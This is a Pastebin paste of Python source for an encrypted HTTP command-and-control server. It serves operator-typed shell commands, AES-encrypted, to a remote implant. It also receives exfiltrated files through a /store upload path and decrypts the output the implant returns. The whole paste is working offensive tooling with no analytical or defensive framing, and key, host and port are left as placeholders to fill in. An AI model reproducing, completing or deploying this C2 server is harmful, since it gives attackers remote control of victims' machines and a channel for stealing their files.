Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import http.server
- import os, cgi
- import string
- import random
- from Cryptodome.Cipher import AES
- from Cryptodome.Util import Padding
- IV = <<IV>>
- key = <<KEY>>
- HOST_NAME = <<HOSTNAME>>
- PORT_NUMBER = <<PORT>>
- def encrypt(message):
- encryptor = AES.new(key,AES.MODE_CBC,IV)
- padded_message = Padding.pad(message,16)
- encrypted_message = encryptor.encrypt(padded_message)
- return encrypted_message
- def decrypt(cipher):
- decryptor = AES.new(key,AES.MODE_CBC,IV)
- decrypted_padded_message = decryptor.decrypt(cipher)
- decrypted_message = Padding.unpad(decrypted_padded_message, 16)
- return decrypted_message
- class MyHandler(http.server.BaseHTTPRequestHandler):
- def do_GET(self):
- command = input("Shell> ")
- self.send_response(200)
- self.send_header("Content-type", "text/html")
- self.end_headers()
- command = command.encode('utf8')
- command = encrypt(command)
- self.wfile.write(command)
- def do_POST(self):
- if self.path == '/store':
- try:
- ctype, pdict = cgi.parse_header(self.headers.get('content-type'))
- if ctype == 'multipart/form-data':
- fs = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD':'POST'})
- else:
- print('[-] Unexpected POST request')
- fs_up = fs['file']
- with open('/root/Desktop/Temp/place_holder.txt', 'wb') as o:
- print('[+] Writing file..')
- o.write(fs_up.file.read())
- self.send_response(200)
- self.end_headers()
- except Exception as e:
- print(e)
- return
- self.send_response(200)
- self.end_headers()
- length = int(self.headers['Content-length'])
- postVar = self.rfile.read(length)
- response = postVar.decode()
- print(decrypt(response))
- if __name__ == "__main__":
- server_class = http.server.HTTPServer
- httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)
- print('[+] Listening for incoming HTTP connection on port ' + str(PORT_NUMBER))
- try:
- httpd.serve_forever()
- except KeyboardInterrupt:
- print('[!] Server is terminated')
- httpd.server_close()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement